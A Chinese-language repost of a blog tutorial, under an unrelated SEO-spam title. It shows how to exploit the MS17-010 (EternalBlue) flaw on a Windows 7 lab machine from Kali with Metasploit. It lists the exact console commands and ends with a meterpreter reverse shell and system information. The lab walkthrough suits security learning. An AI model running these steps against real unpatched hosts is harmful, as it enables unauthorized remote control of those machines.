当前位置: 首页> 财经> 访谈 > 电脑软件推广联盟_个人购物网站搭建_太原seo霸屏_站长之家的seo综合查询工具

电脑软件推广联盟_个人购物网站搭建_太原seo霸屏_站长之家的seo综合查询工具

时间:2025/8/22 17:53:09来源:https://blog.csdn.net/qq_51627054/article/details/145473399 浏览次数:1次
电脑软件推广联盟_个人购物网站搭建_太原seo霸屏_站长之家的seo综合查询工具

1.准备环境win7操作系统(被攻击机)以及kali系统(攻击机),kali使用msf工具进行攻击。

2.打开kali终端,进入msf,输入msfconsole然后等待启动。

┌──(root㉿kali-chifan)-[~]
└─# msfconsole

 3.搜索漏洞远程攻击MS17-010漏洞。

msf6 > search MS17-010

 4.搜索到这个漏洞,使用use命令,使用这个漏洞。

msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

5.查信息,使用info命令查看相关信息,查看如何使用这个脚本。

msf6 >info

6.根据刚刚查询的信息设置所需参数参数 ,现在是已经进入使用这个漏洞,required提示yes的地方需要设置对应参数。

msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.0.101
rhosts => 192.168.0.101
msf6 exploit(windows/smb/ms17_010_eternalblue) > set target 1
target => 1

 7.开始运行。发现攻击成功。

msf6 exploit(windows/smb/ms17_010_eternalblue) > run
.......
meterpreter > sysinfo
Computer        : ADMIN-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows

 8.至此结束,写的不算是太详细,但是流程跟我上一篇类似,可以作为参考。可以参考这个漏洞实操MS08-067漏洞攻击远程控制win2003系统详细简单-CSDN博客。如果你也感兴趣可以点个关注支持一下。

关键字:电脑软件推广联盟_个人购物网站搭建_太原seo霸屏_站长之家的seo综合查询工具

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: